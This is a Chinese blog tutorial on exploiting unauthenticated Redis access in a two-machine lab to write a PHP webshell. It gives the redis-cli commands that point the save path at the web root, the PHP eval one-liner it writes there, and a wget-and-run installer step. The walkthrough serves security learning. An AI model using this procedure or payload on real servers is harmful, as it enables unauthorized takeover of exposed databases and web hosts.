Redis未授权访问漏洞(二)Webshell提权篇

最新推荐文章于 2024-04-30 04:14:16 发布
最新推荐文章于 2024-04-30 04:14:16 发布
阅读量747 收藏 1
点赞数 1
分类专栏: 未授权漏洞集合 文章标签: redis 数据库 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/128619244
版权

前言

在学习这篇文章之前,请先通过这篇文章Redis未授权访问漏洞(一)先导篇学习一下基础知识,再来学习这篇文章。

webshell提权

环境准备

攻击机: Centos7 IP:192.168.44.130
靶机:Centos7 IP:192.168.44.129

首先我们需要准备好两台安装Redis服务的机器,安装步骤可以参考先导篇的内容进行安装,然后在靶机上安装phpstudy开启Web服务为我们的Webshell提权提供基础环境。

在这里插入图片描述yum install -y wget && wget -O install.sh https://notdocker.xp.cn/install.sh && sh install.sh

Centos7中安装phpstudy直接执行这条命令即可

phpstudy -start

开启小皮面板

在这里插入图片描述
实战实验

步骤一:通过前期的信息收集,确定Web服务器开放80端口,然后攻击机连接Web服务器开放的6379端口

我们通过攻击机启动Redis客户端去远程连接靶机的6379端口,模仿黑客通过公网的6379端口入侵企业的Web服务器

redis-cli -h 192.168.44.129 -p 6379

在这里插入图片描述连接成功

步骤二:通过各种方法找出网站的根目录

然后我们在通过浏览器去访问靶机的Web服务:
在这里插入图片描述可以看到这里的根目录已经暴露出来了,实战中我们这一步就是要通过各种办法找到网站的根目录

步骤三:修改网站的动态配置,将网站的保存文件路劲修改为网站的根路劲,文件名可以随便写

config set dir /www/admin/localhost_80/wwwroot

config set dbfilename redis.php

步骤四:往数据库中写入一句话木马,然后保存

set x "<?php @eval($_POST[wuya]); ?>"

save

步骤五:通过浏览器确定文件是否写入成功,同时也确定文件路劲:

在这里插入图片描述
步骤六:通过中国蚁剑连接

在这里插入图片描述
在这里插入图片描述

怰月
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
redis授权访问漏洞三种方式
FryhRx的博客
04-10 8577
redis授权访问漏洞三种方式 文章目录redis授权访问漏洞三种方式前言一、redis是什么?二、漏洞利用条件1. redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网。2.没有设置密码认证(一般为空),可以免密码远程登录redis服务。三、漏洞利用1、利用rediswebshell2、写ssh-keygen公钥然后使用私钥登陆3、Redis 写入计划任务四、 Redis授权访问防御方法 前言 扫描/连接默认的63
61升-Redis&Postgre&令牌窃取&进程注入
san3144393495的博客
12-22 1180
主要讲解redis数据库和postgresql数据库,然后还要两个windows的方式令牌窃取和进程注入。postgresql是基于两个cve的漏洞redis方式第一种是利用任务执行的反弹shell,第二个是写一个ssh-keygen的公钥使用私钥登录,这是因为redis默认搭建在redis上面,所以常用的就是写ssh;限比较低的话还是可以进行webshell的写入。
黑客攻防Redis拉锯战之Root_redis配置不当致使root被漏洞redis配置不当致使root被漏洞
最新发布
2401_84253132的博客
04-30 585
奔溃这一次的安全事故只不过是在我们日常开发工程中的一些案例,而像“XSS”、“SQL注入”等等安全隐患都需要我们去注意。先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7深知大多数程序员,想要升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学升又不知道该从何学起的朋友。
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1838
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
Redis 授权访问 写入webshell记录
qq_38053759的博客
04-08 840
Redis 授权访问 写入webshell记录 准备环境: win10(192.168.39.52): 小皮面板(redis) kali(192.168.39.191):redis 1.Redis安装 win10:安装小皮面板,利用小皮面板安装redis。软件管理》工具,点击安装即可。 点击redis设置,系统默认绑定IP为:127.0.0.1,改为0.0.0.0(默认绑定本地的话远程无法访问redis,故设置为0.0.0.0,即所有IP均可访问) 配置完成到首页启动redis即可.
getshell
inslight的博客
09-22 1508
getshell
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
python脚本实现Redis授权批量
09-09
主要给大家介绍了关于利用python脚本实现redis授权批量的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧。
Redis授权访问配合SSH key文件利用详解
09-09
主要给大家介绍了关于Redis授权访问配合SSH key文件利用的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
Redis攻防(授权访问、利用redis写入webshell、任务计划反弹、Shellssh-keygen 公钥登录服务器、利用主从复制RCE)
Love&Share
12-13 8353
文章目录授权访问利用redis写入webshell任务计划反弹Shellssh-keygen 公钥登录服务器利用主从复制RCEwindowsSSRF安全设置 REmote DIctionary Server(Redis) 是一个 key-value 存储系统,是跨平台的非关系型(Nosql)数据库 关于Redis可以看菜鸟教程: https://www.runoob.com/redis/redis-tutorial.html 授权访问 主要是因为配置不当,导致授权访问漏洞,进一步将恶意数据写入内.
103.网络安全渗透测试—[升篇1]—[Linux内核漏洞]
qwsn
02-15 7179
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、LINUX 内核漏洞 1、漏洞背景: 2、漏洞利用: (1)实验环境 (2)靶机链接 (3)突破MIME类型限制文件上传获取webshell (4)创建交互式shell (5)查看linux发行版 (6)查找可用的exp (7)进行 (8)切换shell
PHPwebshell源码
08-07
PHPwebshell源码 集合控制台 网路 链接 账户 打包 修改文件
web安全:mysql总结篇
Candour_0的博客
01-15 376
web安全:mysql总结篇
Redis授权访问漏洞之反弹连接,SSH Key免密登陆,Webshell
qq_60115503的博客
05-10 791
Redis简介 REmote DIctionary Server(Redis)是一个由Salvatore Sanfilippo写的key-value存储系统,是跨平台的非关系型数据库(端口:6379) 存储缓存用的数据 需要高速读/写的场合使用它快速读/写 外网Redis配置 找到redis中的redis.cof文件并打开: 修改protectd-mode为no 将#bind 127.0.0.1修改为bind 127.0.0.1 修改daemonize属...
Redis授权访问漏洞搭建复现
m0_58595840的博客
01-05 2717
Redis授权访问漏洞利用方式总结(含靶场搭建)
Redis授权访问的三种利用方式
m0_67402914的博客
08-30 2098
Redis是一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库,并供多种语言的API。
利用Redis写文件限进行ssh登陆linux的漏洞
Vince的专栏
09-30 1287
原理 利用redis的config命令修改rdb文件地址为ssh密钥文件,向redis中写入公共密钥,通过save命令手动刷新到rdb中,此时就可以用私钥登陆了 操作 在本地电脑中(linux为例)生成无密码的密钥 ssh-keygen -t rsa -P '' # 后面直接回车 此时在~/.ssh/下生成两个文件id_rsa和id_rsa.pub,id_rsa是私钥,id_rsa_pub...
Redis授权访问getshell三种方法 (3、根据绝对路径上传webshell
daxi0ng的博客
11-28 1593
利用条件: 1.靶机redis链接授权 2.开了web服务器,并且知道路径(如利用phpinfo,或者错误爆路经),还需要具有文件读写增删改查限(我们可以将dir设置为一个目录a,而dbfilename为文件名b,再执行save或bgsave,则我们就可以写入一个路径为a/b的任意文件。) ...
Redis授权访问漏洞利用总结
热门推荐
Fly_鹏程万里
07-06 2万+
0x01 redis介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。Redis因配置不当可以授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flusha...
redis授权访问漏洞修复
11-03
为修复Redis授权访问漏洞,可以采取以下措施: ``` 代码块1: 1. 修改redis.conf配置文件,将bind 127.0.0.1改为bind 0.0.0.0,这样Redis只会监听本机的IP地址,而不是所有的IP地址。 2. 设置Redis密码,可以在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值